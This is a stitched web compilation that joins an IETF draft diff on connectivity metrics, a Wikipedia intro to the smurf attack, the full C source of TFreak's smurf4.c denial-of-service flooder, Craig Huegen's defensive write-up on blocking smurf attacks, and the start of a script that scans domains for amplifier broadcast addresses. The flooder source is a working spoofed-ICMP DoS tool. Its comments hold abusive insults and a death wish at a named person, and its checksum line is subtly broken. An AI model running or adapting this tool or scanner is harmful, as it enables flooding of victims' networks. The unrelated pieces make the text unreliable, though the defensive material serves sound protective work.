notion of quantifying how long a particular packet from A1 takes to long a particular packet from A1 takes to reach A2. We postpone
reach A2. We postpone discussion of this distinction until the discussion of this distinction until the development of interval-
development of interval-connectivity metrics below. connectivity metrics below.

5. One-way Connectivity 5. One-way Connectivity

5.1. Metric Name: 5.1. Metric Name:

Type-P-Interval-Unidirectional-Connectivity Type-P-Interval-Unidirectional-Connectivity

5.2. Metric Parameters: 5.2. Metric Parameters:
+ Src, the IP address of a host + Src, the IP address of a host

ID IPPM Metrics for Measuring Connectivity October 1998 ID IPPM Metrics for Measuring Connectivity November 1998

+ Dst, the IP address of a host + Dst, the IP address of a host
+ T, a time + T, a time
+ dT, a duration + dT, a duration
{Comment: Thus, the closed interval [T, T+dT] denotes a time {Comment: Thus, the closed interval [T, T+dT] denotes a time
interval.} interval.}

5.3. Metric Units: 5.3. Metric Units:

Boolean. Boolean.

skipping to change at page 6, line 5 skipping to change at page 6, line 5
Boolean. Boolean.

6.4. Definition: 6.4. Definition:

Addresses A1 and A2 have *Type-P-Interval-Bidirectional-Connectivity* Addresses A1 and A2 have *Type-P-Interval-Bidirectional-Connectivity*
between them during the interval [T, T+dT] if address A1 has Type-P- between them during the interval [T, T+dT] if address A1 has Type-P-
Interval-Unidirectional-Connectivity to address A2 during the Interval-Unidirectional-Connectivity to address A2 during the
interval and address A2 has Type-P-Interval-Unidirectional- interval and address A2 has Type-P-Interval-Unidirectional-
Connectivity to address A1 during the interval. Connectivity to address A1 during the interval.

ID IPPM Metrics for Measuring Connectivity October 1998 ID IPPM Metrics for Measuring Connectivity November 1998

6.5. Discussion: 6.5. Discussion:

This metric is not quite what's needed for defining "generally This metric is not quite what's needed for defining "generally
useful" connectivity - that requires the notion that a packet sent useful" connectivity - that requires the notion that a packet sent
from A1 to A2 can elicit a response from A2 that will reach A1. With from A1 to A2 can elicit a response from A2 that will reach A1. With
this definition, it could be that A1 and A2 have full-connectivity this definition, it could be that A1 and A2 have full-connectivity
but only, for example, at at time T1 early enough in the interval [T, but only, for example, at time T1 early enough in the interval [T,
T+dT] that A1 and A2 cannot reply to packets sent by the other. This T+dT] that A1 and A2 cannot reply to packets sent by the other. This
deficiency motivates the next metric. deficiency motivates the next metric.

7. Two-way Temporal Connectivity 7. Two-way Temporal Connectivity

7.1. Metric Name: 7.1. Metric Name:

Type-P1-P2-Interval-Temporal-Connectivity Type-P1-P2-Interval-Temporal-Connectivity

7.2. Metric Parameters: 7.2. Metric Parameters:

skipping to change at page 7, line 5 skipping to change at page 7, line 5
Address Src has *Type-P1-P2-Interval-Temporal-Connectivity* to Address Src has *Type-P1-P2-Interval-Temporal-Connectivity* to
address Dst during the interval [T, T+dT] if there exist times T1 and address Dst during the interval [T, T+dT] if there exist times T1 and
T2, and time intervals dT1 and dT2, such that: T2, and time intervals dT1 and dT2, such that:
+ T1, T1+dT1, T2, T2+dT2 are all in [T, T+dT]. + T1, T1+dT1, T2, T2+dT2 are all in [T, T+dT].
+ T1+dT1 <= T2. + T1+dT1 <= T2.
+ At time T1, Src has Type-P1 instantanous connectivity to Dst. + At time T1, Src has Type-P1 instantanous connectivity to Dst.
+ At time T2, Dst has Type-P2 instantanous connectivity to Src. + At time T2, Dst has Type-P2 instantanous connectivity to Src.
+ dT1 is the time taken for a Type-P1 packet sent by Src at time T1 + dT1 is the time taken for a Type-P1 packet sent by Src at time T1
to arrive at Dst. to arrive at Dst.

ID IPPM Metrics for Measuring Connectivity October 1998 ID IPPM Metrics for Measuring Connectivity November 1998

+ dT2 is the time taken for a Type-P2 packet sent by Dst at time T2 + dT2 is the time taken for a Type-P2 packet sent by Dst at time T2
to arrive at Src. to arrive at Src.

7.5. Discussion: 7.5. Discussion:

This metric defines "generally useful" connectivity -- Src can send a This metric defines "generally useful" connectivity -- Src can send a
packet to Dst that elicits a response. Because many applications packet to Dst that elicits a response. Because many applications
utilize different types of packets for forward and reverse traffic, utilize different types of packets for forward and reverse traffic,
it is possible (and likely) that the desired responses to a Type-P1 it is possible (and likely) that the desired responses to a Type-P1

skipping to change at page 8, line 5 skipping to change at page 8, line 5

dT = 60 seconds. dT = 60 seconds.
W = 10 seconds. W = 10 seconds.
N = 20 packets. N = 20 packets.

7.6.3. Algorithm: 7.6.3. Algorithm:

+ Compute N *sending-times* that are randomly, uniformly distributed + Compute N *sending-times* that are randomly, uniformly distributed
over [T, T+dT-W]. over [T, T+dT-W].

ID IPPM Metrics for Measuring Connectivity October 1998 ID IPPM Metrics for Measuring Connectivity November 1998

+ At each sending time, transmit from A1 a well-formed packet of + At each sending time, transmit from A1 a well-formed packet of
type P1 to A2. type P1 to A2.
+ Inspect incoming network traffic to A1 to determine if a + Inspect incoming network traffic to A1 to determine if a
successful reply is received. The particulars of doing so are successful reply is received. The particulars of doing so are
dependent on types P1 & P2, discussed below. If a successful dependent on types P1 & P2, discussed below. If any successful
reply is received, the value of the measurement is "true". reply is received, the value of the measurement is "true". At
this point, the measurement can terminate.
+ If no successful replies are received by time T+dT, the value of + If no successful replies are received by time T+dT, the value of
the measurement is "false". the measurement is "false".

7.6.4. Discussion: 7.6.4. Discussion:

The algorithm is inexact because it does not (and cannot) probe The algorithm is inexact because it does not (and cannot) probe
temporal connectivity at every instant in time between [T, T+dT]. temporal connectivity at every instant in time between [T, T+dT].
The value of N trades off measurement precision against network The value of N trades off measurement precision against network
measurement load. The state-of-the-art in Internet research does not measurement load. The state-of-the-art in Internet research does not
yet offer solid guidance for picking N. The values given above are yet offer solid guidance for picking N. The values given above are

skipping to change at page 9, line 5 skipping to change at page 9, line 5
the three-way handshake is not completed, however, which will the three-way handshake is not completed, however, which will
occur if the measurement tool on A1 synthesizes its own initial occur if the measurement tool on A1 synthesizes its own initial
SYN packet rather than going through A1's TCP stack, then A1's TCP SYN packet rather than going through A1's TCP stack, then A1's TCP
stack will automatically terminate the connection in a reliable stack will automatically terminate the connection in a reliable
fashion as A2 continues transmitting the SYN-ack in an attempt to fashion as A2 continues transmitting the SYN-ack in an attempt to
establish the connection. Finally, we note that using A1's TCP establish the connection. Finally, we note that using A1's TCP
stack to conduct the measurement complicates the methodology in stack to conduct the measurement complicates the methodology in
that the stack may retransmit the initial SYN packet, altering the that the stack may retransmit the initial SYN packet, altering the
number of probe packets sent.} number of probe packets sent.}

ID IPPM Metrics for Measuring Connectivity October 1998 ID IPPM Metrics for Measuring Connectivity November 1998

+ A RST packet from A2 to A1 with the proper ports indicates + A RST packet from A2 to A1 with the proper ports indicates
temporal connectivity between the addresses (and a *lack* of temporal connectivity between the addresses (and a *lack* of
service connectivity for TCP-port-N1-port-N2 - something that service connectivity for TCP-port-N1-port-N2 - something that
probably should be addressed with another metric). probably should be addressed with another metric).
+ An ICMP port-unreachable from A2 to A1 indicates temporal + An ICMP port-unreachable from A2 to A1 indicates temporal
connectivity between the addresses (and again a *lack* of service connectivity between the addresses (and again a *lack* of service
connectivity for TCP-port-N1-port-N2). {Comment: TCP connectivity for TCP-port-N1-port-N2). {Comment: TCP
implementations generally do not need to send ICMP port- implementations generally do not need to send ICMP port-
unreachable messages because a separate mechanism is available unreachable messages because a separate mechanism is available

skipping to change at page 9, line 43 skipping to change at page 9, line 43
9. Security Considerations 9. Security Considerations

As noted in RFC 2330, active measurement techniques, such as those As noted in RFC 2330, active measurement techniques, such as those
defined in this document, can be abused for denial-of-service attacks defined in this document, can be abused for denial-of-service attacks
disguised as legitimate measurement activity. Furthermore, testing disguised as legitimate measurement activity. Furthermore, testing
for connectivity can be used to probe firewalls and other security for connectivity can be used to probe firewalls and other security
mechnisms for weak spots. mechnisms for weak spots.

10. References 10. References

F. Baker, "Requirements for IP Version 4 Routers", RFC 1812, June [RFC1812]
1995. F. Baker, "Requirements for IP Version 4 Routers", June 1995.

R. Braden, "Requirements for Internet hosts - communication layers", [RFC1122]
RFC 1122, October 1989. R. Braden, Editor, "Requirements for Internet Hosts -- Communi-
cation Layers," Oct. 1989.

V. Paxson, G. Almes, J. Mahdavi, and M. Mathis, Paxson, "Framework [RFC2330]
for IP Performance Metrics", RFC 2330, May 1998.

ID IPPM Metrics for Measuring Connectivity October 1998 ID IPPM Metrics for Measuring Connectivity November 1998

J. Postel, "Internet Protocol", RFC 791, September 1981. V. Paxson, G. Almes, J. Mahdavi, and M. Mathis, "Framework for
IP Performance Metrics", May 1998.

[RFC791]
J. Postel, "Internet Protocol", September 1981.

11. Authors' Addresses 11. Authors' Addresses

Jamshid Mahdavi Jamshid Mahdavi
Pittsburgh Supercomputing Center Pittsburgh Supercomputing Center
4400 5th Avenue 4400 5th Avenue
Pittsburgh, PA 15213 Pittsburgh, PA 15213
USA USA

Vern Paxson Vern Paxson

End of changes.

This html diff was produced by rfcdiff 1.23, available from http://www.levkowetz.com/ietf/tools/rfcdiff/

Smurf attack
From Wikipedia, the free encyclopedia
Jump to: navigation, search

The smurf attack, named after its exploit program, is a denial-of-service attack which uses spoofed broadcast ping messages to flood a target system.

In such an attack, a perpetrator sends a large amount of ICMP echo (ping) traffic to IP broadcast addresses, all of it having a spoofed source address of the intended victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply each, multiplying the traffic by the number of hosts responding. On a multi-access broadcast network, potentially hundreds of machines might reply to each packet.

Several years ago, most IP networks could lend themselves thus to smurf attacks -- in the lingo, they were "smurfable". Today, thanks largely to the ease with which administrators can make a network immune to this abuse, very few networks remain smurfable. [1]

To secure a network with a Cisco router from taking part in a smurf attack, it suffices to issue the router command no ip directed-broadcast .

Well, I suppose its `safe' to release this, it seems everyone and their dog has
it and apparantly (and to my surprise) it still works.

The `smurf' attack is quite simple. It has a list of broadcast addresses which
it stores into an array, and sends a spoofed icmp echo request to each of those
addresses in series and starts again. The result is a devistating attack upon
the spoofed ip with, depending on the amount of broadcast addresses used,
many, many computers responding to the echo request.

Before I continue may I first say that this code was a mistake. When it was
written I was not aware of the fact that a) the world would get its hands on it
and b) it would have such a destructive effect on the computers being used to
flood. My ignorance is my mistake. I extremely regret writing this, but as
you well know, if things aren't `exploited' then they aren't fixed.

Now that that's cleared up, how do you protect your network? Well,
unfortunatly I am not sure how or even if it is possible to protect yourself
from being hit with it, unless you wanted to deny all incoming icmp traffic at
the router which isn't the best solution as it renders other useful oddities
(such as ping and traceroute) unusable. To prevent your network from being
used to flood (using up almost all your bandwith therefore creating a denial
of service upon yourself.. technically) is quite easy and not a great loss to
your network. If you filter all incoming icmp traffic to the broadcast address
at the router none of the machines will respond therefore the attack will not
work. This can be done with one line in the router, and I believe a rep from
texas.net posted the solution for this (perhaps it could be reposted?).

I believe MCI is currently working on a patch or dectector of some kind for it,
which is available at
http://www.internetnews.com/isp-news/1997/10/0901-mci.html

Please, patch your networks, if there's nothing to flood with then there's no
flood.

Respectfully,

TFreak

--- 8< smurf4.c >8 ---

/*
*
* $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
*
* spoofs icmp packets from a host to various broadcast addresses resulting
* in multiple replies to that host from a single packet.
*
* mad head to:
* nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea pig,
* MissSatan for swallowing, napster for pimping my sister, the guy that
* invented vaseline, fyber for trying, knowy, old school #havok, kain
* cos he rox my sox, zuez, toxik, robocod, and everyone else that i might
* have missed (you know who you are).
*
* hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy
* thing he is (he's -almost- as stubborn as me, still i managed to pick up
* half the cheque).
*
* and a special hi to Todd, face it dude, you're fucking awesome.
*
* mad anal to:
* #madcrew/#conflict for not cashing in their cluepons, EFnet IRCOps
* because they plain suck, Rolex for being a twit, everyone that
* trades warez, Caren for being a lesbian hoe, AcidKill for being her
* partner, #cha0s, sedriss for having an ego in inverse proportion to
* his penis and anyone that can't pee standing up -- you don't know what
* your missing out on.
*
* and anyone thats ripped my code (diff smurf.c axcast.c is rather
* interesting).
*
* and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill
* Robbins for trying to steal my girlfriend. Not only did you show me
* no respect but you're a manipulating prick who tried to take away the
* most important thing in the world to me with no guilt whatsoever, and
* for that I wish you nothing but pain. Die.
*
* disclaimer:
* I cannot and will not be held responsible nor legally bound for the
* malicious activities of individuals who come into possession of this
* program and I refuse to provide help or support of any kind and do NOT
* condone use of this program to deny service to anyone or any machine.
* This is for educational use only. Please Don't abuse this.
*
* Well, i really, really, hate this code, but yet here I am creating another
* disgusting version of it. Odd, indeed. So why did I write it? Well, I,
* like most programmers don't like seeing bugs in their code. I saw a few
* things that should have been done better or needed fixing so I fixed
* them. -shrug-, programming for me as always seemed to take the pain away
* ...
*
*
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

void banner(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
unsigned short in_chksum(u_short *, int);

/* stamp */
char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";

int main (int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
FILE *bcastfile;
int i, sock, bcast, delay, num, pktsize, cycle = 0, x;
char buf[32], **bcastaddr = malloc(8192);

banner();
signal(SIGINT, ctrlc);

if (argc < 6) usage(argv[0]);

if ((he = gethostbyname(argv[1])) == NULL) {
perror("resolving source host");
exit(-1);
}
memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(0);

num = atoi(argv[3]);
delay = atoi(argv[4]);
pktsize = atoi(argv[5]);

if ((bcastfile = fopen(argv[2], "r")) == NULL) {
perror("opening bcast file");
exit(-1);
}
x = 0;
while (!feof(bcastfile)) {
fgets(buf, 32, bcastfile);
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n') buf[i] = '\0';
bcastaddr[x] = malloc(32);
strcpy(bcastaddr[x], buf);
x++;
}
bcastaddr[x] = 0x0;
fclose(bcastfile);

if (x == 0) {
fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
exit(-1);
}
if (pktsize > 1024) {
fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
exit(-1);
}

if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("getting socket");
exit(-1);
}
setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));

printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);

for (i = 0; i < num || !num; i++) {
if (!(i % 25)) { printf("."); fflush(stdout); }
smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
cycle++;
if (bcastaddr[cycle] == 0x0) cycle = 0;
usleep(delay);
}
puts("\n\n");
return 0;
}

void banner (void)
{
puts("\nsmurf.c v4.0 by TFreak\n");
}

void usage (char *prog)
{
fprintf(stderr, "usage: %s "
" \n\n"
"target = address to hit\n"
"bcast file = file to read broadcast addresses from\n"
"num packets = number of packets to send (0 = flood)\n"
"packet delay = wait between each packet (in ms)\n"
"packet size = size of packet (< 1024)\n\n", prog);
exit(-1);
}

void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
{
struct iphdr *ip;
struct icmphdr *icmp;
char *packet;

packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));

memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);

ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip->ihl = 5;
ip->version = 4;
ip->ttl = 255;
ip->tos = 0;
ip->frag_off = 0;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = dest;
ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
icmp->type = 8;
icmp->code = 0;
icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);

sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,
0, (struct sockaddr *)&sin, sizeof(struct sockaddr));

free(packet); /* free willy! */
}

void ctrlc (int ignored)
{
puts("\nDone!\n");
exit(1);
}

unsigned short in_chksum (u_short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;

while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}

if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}

sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

--------------------------------------------------------------------------------

Along these same lines, Craig Huegen has written up some documentation that
gives an in depth explination of smurfing and prevention measures at
http://www.quadrunner.com/~c-huegen/smurf.txt

From the web page:
---------------------------------------------------
THE LATEST IN DENIAL OF SERVICE ATTACKS: "SMURFING"
DESCRIPTION AND INFORMATION TO MINIMIZE EFFECTS

Craig A. Huegen
chuegen@quadrunner.com

Last Update: Fri Oct 10 12:20 PDT

New additions:
* More minor corrections
* Added MCI's DoSTracker program (announced at N+I 10/9/97)
* Changed "helpers" to "bounce sites" (kcooper@bbnplanet.com)
* Added preliminary information about Bay Networks routers
(jcgreen@netins.net)
* Added further information about Proteon/OpenROUTE routers
(dts@senie.com)

Editor's plea: *please* distribute this information freely, and abide by
my redistribution requirements (see the very end) when doing so. It's
important that these attacks be minimized, and communication is the only
way to help with this.

OVERVIEW:

The information here provides in-depth information regarding "smurf"
attacks, with a focus on Cisco routers and how to reduce the effects of
the attack. Some information is general and not related to an
organization's particular vendor of choice; however, it is written with a
Cisco router focus. No confirmation has been made to the effects on other
vendors' equipment; however, others have provided me with information for
various vendors, which is provided in the document. See the
"Acknowledgements" section below for the sources and contact information.
I am happy to accept information from other colleagues who are willing to
provide information about other vendors' products in relation to this
topic.

This paper is always being updated as I receive more information about
attacks and work with ways to minimize impact.

DESCRIPTION:

The "smurf" attack, named after its exploit program, is the most recent in
the category of network-level attacks against hosts. A perpetrator sends
a large amount of ICMP echo (ping) traffic at broadcast addresses, all of
it having a spoofed source address of a victim. If the routing device
delivering traffic to those broadcast addresses performs the IP broadcast
to layer 2 broadcast function noted below, most hosts on that IP network
will take the ICMP echo request and reply to it with an echo reply each,
multiplying the traffic by the number of hosts responding. On a
multi-access broadcast network, there could potentially be hundreds of
machines to reply to each packet.

Currently, the providers/machines most commonly hit are IRC servers and
their providers.

There are two parties who are hurt by this attack... the intermediary
(broadcast) devices--let's call them "bounce sites", and the spoofed address
target, or the "victim". The victim is the target of a large amount of
traffic that the bounce sites generate.

Let's look at the scenario to paint a picture of the dangerous nature of
this attack. Assume a co-location switched network with 100 hosts, and
that the attacker has a T1. The attacker sends, say, a 768kb/s stream of
ICMP echo (ping) packets, with a spoofed source address of the victim, to
the broadcast address of the "bounce site". These ping packets hit the
bounce site's broadcast network of 100 hosts; each of them takes the packet
and responds to it, creating 100 ping replies outbound. If you multiply
the bandwidth, you'll see that 76.8 Mbps is used outbound from the "bounce
site" after the traffic is multiplied. This is then sent to the victim (the
spoofed source of the originating packets).

HOW TO KEEP YOUR SITE FROM BEING THE SOURCE
PERPETRATORS USE TO ATTACK VICTIMS:

The perpetrators of these attacks rely on the ability to source spoofed
packets to the "bounce sites" in order to generate the traffic which causes
the denial of service.

In order to stop this, all networks should perform filtering either at the
edge of the network where customers connect (access layer) or at the edge
of the network with connections to the upstream providers.

Paul Ferguson of cisco Systems and Daniel Senie of Daniel Senie consulting
have written an Internet-draft pertaining to this topic. See:

ftp://ftp.internic.net/internet-drafts/draft-ferguson-ingress-filtering-02.txt

for more information on this subject. The authors expect to have it
published as an Informational RFC prior to the December IETF meeting.

HOW TO STOP BEING AN INTERMEDIARY:

This attack relies on the router serving a large multi-access broadcast
network to frame an IP broadcast address (such as 10.255.255.255) into a
layer 2 broadcast frame (for Ethernet, FF:FF:FF:FF:FF:FF). The RFC for
routing states that a router MAY perform this translation for directed
broadcasts. Because in a few select cases it is desirable, and it hasn't
been proved undesirable (except in the recent DoS attacks), most vendors
have chosen to implement this behavior. Generally, with IP providers and
the Internet as we know it today, this behavior should not be needed.

(Editor's note: I welcome other examples where this is needed in today's
networking--see below for a single example I know of.)

Ethernet NIC hardware (MAC-layer hardware, specifically) will only listen
to a select number of addresses in normal operation. The one MAC address
that all devices share in common in normal operation is the media
broadcast, or FF:FF:FF:FF:FF:FF. In this case, a device will take the
packet and send an interrupt for processing.

Because most host IP stacks pay little attention to the destination
address in the IP header of an ICMP packet, or (if they check the IP
header for ICMP) implement responding to ICMP broadcasts, the packet is
handed to the ICMP layer, where in the case of smurf attacks, an ICMP echo
reply is prepared and shipped out to the spoofed address source of the
packet-- the victim.

To stop your Cisco router from converting these layer 3 broadcasts into
layer 2 broadcasts, use the "no ip directed-broadcast" interface
configuration command. This should be configured on all routers which
provide routing to large multi-access broadcast networks (generally LANs),
with more than 5-10 devices. It is unnecessary on point-to-point
interfaces, such as POS, serial T1, HSSI, etc., because point-to-point
interfaces will only generate two replies--one for each end of the link.
No testing has been done on multipoint frame-relay; routers on NBMA
networks typically do not forward broadcasts unless explicitly configured
to do so. Point-to-point sub-interface models will behave like many
point-to-point links--again, this command will have little effect,
stopping only one of the two replies.

Other vendor information:

* Proteon/OpenROUTE:
Daniel Senie (dts@senie.com) reports that Proteon/OpenROUTE Networks
routers have an option to turn off directed broadcasts in the IP
Configuration menus. The command sequence to turn them off is:
*CONFIG (on newer routers) or TALK 6 (on older routers)
Config>PROTOCOL IP
IP Config>DISABLE DIRECTED-BROADCAST
A restart of the router is then required.
* Bay Networks:
Jon Green (jcgreen@netins.net) reports that under current code, there
is no way to keep Bay Networks routers from converting layer 3
broadcasts to layer 2 broadcasts short of applying a per-interface
filter, eliminating packets to the broadcast. However, there is a
feature request to add a configuration option, and it is expected
to be in BayRS version 12.0.

There is one case study where this will stop intended behavior: In the
case where samba (an SMB server for UNIX) or NT is used to "remote
broadcast" into a LAN workgroup so that the workstations on that LAN can
see the server, this will prevent the LAN machines from seeing the remote
server. This is *only* in the case where there is no WINS server (WINS is
routed unicast) and a "remote broadcast" is being used--it's a rare but
notable condition.

INFORMATION FOR VICTIMS AND HOW TO SUPPRESS ATTACKS:

The amount of bandwidth and packets per second (pps) that can be generated
by this attack is quite large. With a 200-host LAN, I was able to
generate over 80 Mbits/sec traffic at around 35 Kpps toward my target--a
pretty significant amount. The victims receive this because traffic is
multiplied by the number of hosts on the broadcast network used (in this
case, with a 200-host network, I was only required to send 400 Kbits/sec
to the broadcast address--less than one-third of a T1).

Many hosts cannot process this many packets per second; many hosts are
connected to 10 Mbit/sec Ethernet LANs where more traffic than wire speed
is sent. Therefore, the ability to drop these packets at the network
border, or even before it flows down the ingress pipes, is desired.

(This next section assumes IOS behavior with standard central switching--
FIB/CEF isn't covered here, the behavior is different, I believe.)

Cisco routers have several "paths" which packets can take to be routed;
each has a varying degree of overhead. The slowest of these is "process"
switching. This is used when a complex task is required for processing
packets. The other modes are variations of a fast path--each of them with
a set of advantages and disadvantages. However, they're all handled at
interrupt level (no process-level time is required to push these packets).

In IOS versions (even the most recent), access-list denies are handled at
the process (slow) level, because they require an ICMP unreachable to be
generated to the originating host. All packets were sent to the process
level automatically to be handled this way.

Under a recent code change (Cisco bug ID CSCdj35407--integrated in version
11.1(14)CA and later), packets denied by an access-list will be dropped at
the interrupt (fast) level, with the exception of 2 packets per second per
access-list deny line. These 2 packets per second will be used to send the
"ICMP unreachable via administrative block" messages. This assumes that
you don't want to log the access-list violations (via the "log" or
"log-input" keywords). The ability to rate-limit "log-input" access-list
lines (in order to more easily log these packets) is currently being
integrated; see the section below on tracing spoofed packet attacks for
information on logging.

Filtering ICMP echo reply packets destined for your high-profile machines
at the ingress interfaces of the network border routers will then permit
the packets to be dropped at the earliest possible point. However, it
does not mean that the network access pipes won't fill, as the packets
will still come down the pipe to be dropped at the router. It will,
however, take the load off the system being attacked. Keep in mind that
this also denies others from being able to ping from that machine (the
replies will never reach the machine).

For those customers of providers who use Cisco, this may give you some
leverage with the providers' security teams to help save your pipes by
filtering before the traffic is sent to you.

Efforts are underway to integrate these fixes in the other major versions
and branches as well.

TRACING SPOOFED PACKET STREAMS:

Tracking these attacks can prove to be difficult, but is possible with
coordination and cooperation from providers. This section also assumes
Cisco routers, because I can speak only about the abilities of Cisco to
log/filter packets and what impact it may have.

Today, logging packets which pass through or get dropped in an ACL is
possible; however, all packets with the "log" or "log-input" ACL options
are sent to process level for logging. For a large stream of packets,
this could cause excessive CPU problems. For this reason, tracking
attacks via IOS logging today is limited to either lower bandwidth attacks
(smaller than 10k packets per second). Even then, the number of log
messages generated by the router could overload a syslog server.

Cisco bug ID CSCdj35856 addresses this problem. It has been integrated
into IOS version 11.1CA releases beginning with 11.1(14.1)CA (a
maintenance interim release), and makes it possible to log packets at
defined intervals and to process logged packets not at that interval in
the fast path. I will update this page with version numbers as the
releases are integrated.

Some information on logging:

In later 11.1 versions, a new keyword was introduced for ACL logging:
"log-input". A formatted ACL line utilizing the keyword looks like this:

access-list 101 permit icmp any any echo log-input

When applied to an interface, this line will log all ICMP ping packets
with input interface and MAC address (for multi-access networks).
Point-to-point interfaces will not have a MAC address listed.

Here's an example of the log entry for a multi-access network (FDDI, Ether):

Sep 10 23:17:01 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp
10.0.7.30 (FastEthernet1/0 0060.3e2f.6e41) -> 10.30.248.3 (8/0), 5 packets

Here's an example of the log entry for a point-to-point network:

Sep 10 23:29:00 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp
10.0.7.30 (BRI0 *PPP*) -> 10.0.19.242 (8/0), 1 packet

Substituting "log" for "log-input" will eliminate the incoming interface
and MAC address from the log messages.

We'll use the first log entry to demonstrate how to go from here. This
log entry means the packet came in on FastEthernet1/0, from MAC address
0060.3e2f.6e41, destined for 10.30.248.3. From here, you can use "show ip
arp" (if needed) to determine the IP address for the MAC address, and go
to the next hop for tracing or contact the necessary peer (in the case of
an exchange point). This is a hop-by-hop tracing method.

Example of "show ip arp" used to find next hop:

netlab#show ip arp 0060.3e2f.6e41
Protocol Address Age (min) Hardware Addr Type Interface
Internet 10.0.183.65 32 0060.3e2f.6e41 ARPA FastEthernet1/0

As you can see, 10.0.183.65 is the next hop where the packets came from
and we should go there to continue the tracing process, utilizing the same
ACL method. By doing this, you can track the spoof attack backwards.

While this is general information on tracking spoofed packets, it must be
noted that the victims of a smurf attack get packets from the listed source
in the packets; i.e., they receive echo-reply packets truly from the source
listed in the IP header. This information should be used by the bounce sites
or intermediaries to track the spoofed echo _request_ packets back to
their source (the perpetrator).

MCI's Internet Security team has put together a perl script which, in an
automated fashion, can log into your Cisco routers and trace a spoof attack
back to its source. The program is available, free of charge. See
http://www.security.mci.net/dostracker/ for more information.

OTHER DENIAL OF SERVICE ATTACKS WORTHY OF MENTION:

Two other denial of service attacks frequently encountered are TCP SYN
floods, and UDP floods aimed at diagnostic ports on hosts.

TCP SYN attacks consist of a large number of spoofed TCP connection set-up
messages aimed at a particular service on a host. Older TCP
implementations cannot handle many faked connection set-up packets, and
will not allow access to the victim service.

The most common form of UDP flooding directed at harming networks is an
attack consisting of a large number of spoofed UDP packets aimed at
diagnostic ports on network devices. This attack is also known as the
"pepsi" attack (again named after the exploit program), and can cause
network devices to use up a large amount of CPU time responding to these
packets.

To get more information on minimizing the effects of these two attacks,
see:

Defining Strategies to Protect Against TCP SYN
Denial of Service Attacks
http://cio.cisco.com/warp/public/707/4.html

Defining Strategies to Protect Against UDP Diagnostic
Port DoS Attacks
http://cio.cisco.com/warp/public/707/3.html

PERFORMANCE INFORMATION:

One ISP has reported that, spread across three routers (2 RSP2 and 1
RSP4), the fast drop code eliminated a sustained 120 Mbits/sec smurf
attack and kept the network running without performance problems.

As always, your mileage may vary.

ACKNOWLEDGEMENTS:

Thanks to all those who helped review and provide input to the paper, as
well as sanity checking.

Specific thanks to:

* Ravi Chandra of Cisco Systems for information on the bugfixes.
* Daniel Senie of Daniel Senie Consulting, Jon Green of Bay Networks for
information on other vendors' equipment.
* Paul Ferguson of Cisco Systems, Kelly Cooper of GTE/BBN, Rob McMillan of
CERT for sanity-check and review comments.

Referenced documents:

This section is coming soon. =)

PERMISSION TO DUPLICATE:

Permission to duplicate this information is granted under these terms:

1. My name and e-mail address remains on the information as a target for
questions and identification of the source
2. My disclaimer appears on the information at the bottom
3. Feel free to add extra information from other discussions, etc., but
please ensure the correct attribution is made to the author. Also
provide Craig Huegen (chuegen@quadrunner.com) a copy of your additions.
4. Please help disseminate this information to other network
administrators who are affected by these attacks.

If you have questions, I will be happy to answer them to the best of my
knowledge.

MY DISCLAIMER:

I'm speaking about this as an interested party only. All text in this
paper was written by me; I speak/write for no one but myself. No vendors
have officially confirmed/denied any of the information contained herein.
All research for this paper is being done purely as a matter of
self-interest and desire to help others minimize effects of this attack.

Craig A. Huegen
chuegen@quadrunner.com
http://www.quadrunner.com/~chuegen/smurf.txt

----------------------------------------------------------------------------

T. Freak's posted his smurf code, and there's been a few messages
concerning this d.o.s. attack -- I guess now is a good of a time as any to
release this little script.

I'm sure there's a more efficient way of putting something like this
together, but... oh well. Results of the scan are reported into
./bips.results

note: this script has two parts.

--- bips.sh ---

#!/bin/bash
# find broadcast ip's that reply with 30+ dupes.

# i decided to make this script into two sections. when running this make
# sure both parts are in the same directory.

if [ $# != 1 ]; then
echo "$0 "
else
host -l $1 | grep 'has address' | cut -d' ' -f4 > $1.ips
cat $1.ips | cut -d'.' -f1-3 | sort |awk '{ print echo ""$1".255" }' > $1.tmp
cat $1.tmp | uniq | awk '{ print "./chekdup.sh "$1"" }' > $1.ping
